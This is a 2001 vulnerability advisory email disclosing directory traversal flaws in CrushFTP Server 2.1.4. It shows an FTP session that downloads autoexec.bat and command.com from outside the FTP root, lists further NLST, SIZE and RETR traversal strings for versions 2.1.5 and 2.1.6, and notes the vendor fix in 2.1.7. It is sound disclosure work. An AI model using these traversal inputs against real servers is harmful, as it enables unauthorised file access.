Date: Thu, 3 May 2001 13:13:40 -0800
From: [email protected]
To: [email protected]Subject: Vulnerabilities in CrushFTP Server
--Hushpart_boundary_wiVeMMYWZvLzAgpyxHojaSCJWoXAXbqK
Content-type: text/plain
----- Begin Hush Signed Message from [email protected] -----
Vulnerabilities in CrushFTP Server
Overview
CrushFTP Server 2.1.4 is a java ftp server available from
http://www.crushftp.com. Multiple vulnerabilities exist which allow
users to change directories outside of the ftp root and download files.
Details
The following is an illustration of the problem. An ftp root of
"c:\directory\directory" was used.
>ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220-Welcome to CrushFTP!
220 CrushFTP Server Ready.
User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Username OK. Need password.
Password:
230-Welcome!
230 Password OK. Connected.
ftp> get ../../autoexec.bat
200 PORT command successful. 127.0.0.1:1868
150 Opening ASCII mode data connection for ../../autoexec.bat (419 bytes).
226-Download File Size:419 bytes @ 0K/sec.
226 Transfer complete.
ftp: 419 bytes received in 0.00Seconds 419000.00Kbytes/sec.
ftp> cd ...
250 "/.../" CWD command successful.
ftp> get command.com
200 PORT command successful. 127.0.0.1:1870
150 Opening ASCII mode data connection for command.com (93890 bytes).
226-Download File Size:93890 bytes @ 92K/sec.
226 Transfer complete.
ftp: 94570 bytes received in 1.86Seconds 50.84Kbytes/sec.
The vendor issued two versions since I made initial contact to address
additional variations. The following is a list of vulnerabilities which
affected these intermediate versions (v2.1.5, v2.1.6):
NLST ..
NLST ...
SIZE /../../
SIZE /.../
NLST \..\
NLST /../
NLST \...\
RETR \..\.\..\autoexec.bat
RETR ./\...\autoexec.bat
RETR .\.\..\..\autoexec.bat
Solution
Upgrade to v2.1.7 at:
http://www.crushftp.com
Vendor Status
The program author, Ben Spink, was contacted via <[email protected]> on
Friday, April 20, 2001. I would like to thank him for taking this
matter seriously and showing extra effort to resolve these problems.
- Joe Testa
e-mail: [email protected]
web page: http://hogs.rit.edu/~joet
AIM: LordSpankatron
----- Begin Hush Signature v1.3 -----
H4DN+gBMDsfVP0qnC4F8dEdXR7FSneNzs2Now6Thibu+zett3cgrNijdAG77GWmeUrvE
/eoSsg0s6IjBVwrVZXt0CN2XVslnxRwCxpPWAwfVgrQGSGigcRInv/WxWhxA0xEhiffv
Wc3ZnhtPy0toe7N4XKyma58FwlqVRsXKqc5bJgBQquX0wlsnrLkpK3nSVhBBj/NkEkpG
yoyaLAXBNVtfZz+AEdR6iuMZYVdIpsHToi4x5hT6cZNZtjD+MWT8vFT3SsAi0NQ6PqpI
0p6HB8uNJ3ra/oExJleegIDWkJMN/AoIhjuxlrCJxt2yu0CHVeUt+7c353Nv38C8QQvm
bkkLdHMxMj6VvY99mnhyuBcXuJrGigPIguZAp6GER1uARXrv4w0RJ0QIeuB5JI4LXwBb
sIFfCcy/boBIg3QNOPP/eoxGTQ7XCpPBcfXUHrPtk/Xd06XJ/9XhBC+fLzGgHMEE37hH
wbPXMDaJ6OvogRLDVunx+UVJiqjybft960vFm2lgXd75
----- End Hush Signature v1.3 -----
This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools
Free, encrypted, secure Web-based email at www.hushmail.com
--Hushpart_boundary_wiVeMMYWZvLzAgpyxHojaSCJWoXAXbqK--
